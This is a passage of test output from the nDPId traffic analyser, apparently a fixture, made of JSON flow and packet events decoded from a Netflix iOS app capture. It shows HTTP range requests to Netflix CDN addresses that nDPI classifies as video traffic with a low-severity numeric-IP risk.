+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1484319056236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056236,"pkt":"gCqoTGHM5JjWH70UCABFAAA0j6xAAEAGxeXAqAEHF\/YLjc+2AFBDrGT7Kzpk2YAQEBUXoQAAAQEICh9lEJgn2Ak+"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1484319056237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056237,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7dWBL6lu6spYaAS\/\/\/t4QAAAgQFtAEDAwkEAggKuIfCpR9lEIk="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} 
+01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7nPaH08TBX1BaAS\/\/\/55gAAAgQFtAEDAwkEAggKNK+mZh9lEJA="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0QtJAAEAGEsDAqAEHF\/YLjc+7AFDfu3VW4GtWFIAQEBXe3gAAAQEICh9lEL6zW2N6"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} 
+01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 